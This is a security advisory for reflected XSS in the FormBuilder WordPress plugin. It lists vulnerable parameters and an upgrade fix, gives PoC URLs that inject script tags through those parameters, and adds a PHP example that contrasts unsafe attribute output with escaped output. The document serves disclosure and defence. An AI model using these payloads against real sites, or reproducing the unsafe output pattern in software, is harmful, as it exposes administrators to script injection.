FormBuilder [Reflected XSS]
Description
Vulnerable params:
$_GET['pageNumber']
$_GET['formFilterID']
$_GET['formSearchQuery']
The payload is visible in various plugin pages, but they are all under wp-admin/tools.php?page=formbuilder.php.
Additional params may be required in order for this attack to work.
The attacker could also use HTML events because params are printed inside HTML attributes.
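The attribute-context reflection described above, next to an output-encoded version. This is an added example, not FormBuilder's source: the function names and the markup are hypothetical, and treating pageNumber and formFilterID as integers is an assumption.

```php
<?php
// Added illustration; not FormBuilder source. All function names are hypothetical.

// Return a request parameter as a string; arrays (e.g. ?pageNumber[]=x) fall back to the default.
function scalar_param(array $get, string $key, string $default = ''): string
{
    $value = $get[$key] ?? $default;
    return is_scalar($value) ? (string) $value : $default;
}

// Vulnerable pattern: the raw value is concatenated into a quoted attribute,
// so a double quote in the value ends the attribute early.
function render_search_field_unsafe(array $get): string
{
    $query = scalar_param($get, 'formSearchQuery');
    return '<input type="text" name="formSearchQuery" value="' . $query . '">';
}

// Hardened pattern: encode for the attribute context and coerce numeric parameters.
function render_filter_fields_safe(array $get): string
{
    // ENT_QUOTES encodes both " and ', so the value can neither close the attribute
    // nor add an event-handler attribute. Inside WordPress, esc_attr() fills this role.
    $query = htmlspecialchars(scalar_param($get, 'formSearchQuery'), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // Assumption: both values are numeric identifiers, so anything else collapses to a safe integer.
    $page   = max(1, (int) scalar_param($get, 'pageNumber', '1'));
    $filter = max(0, (int) scalar_param($get, 'formFilterID', '0'));

    return '<input type="text" name="formSearchQuery" value="' . $query . '">' . "\n"
         . '<input type="hidden" name="pageNumber" value="' . $page . '">' . "\n"
         . '<input type="hidden" name="formFilterID" value="' . $filter . '">';
}

// Constructed request, reusing the payload shape from the PoC on this page.
$get = [
    'formSearchQuery' => '"><script>alert(/formSearchQuery/)</script>',
    'pageNumber'      => '"><script>alert(/pageNumber/)</script>',
    'formFilterID'    => '7',
];

echo "unsafe:\n" . render_search_field_unsafe($get) . "\n\n";
echo "safe:\n" . render_filter_fields_safe($get) . "\n";
```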
PoC
http://sbwp4.dev/wp-admin/tools.php?page=formbuilder.php&pageNumber="><script>alert(1)</script>
http://sbwp4.dev/wp-admin/tools.php
?page=formbuilder.php
&fbaction=formResults
&formFilterID="><script>alert(/formFilterID/)</script>
&formSearchQuery="><script>alert(/formSearchQuery/)</script>
&pageNumber="><script>alert(/pageNumber/)</script>
Solution
Upgrade to v1.06
INFO
- 26 July 2016
- Pan Vag
- www.warkior.com
- FormBuilder
- WordPress 4.5.2
- DWF-2016-87105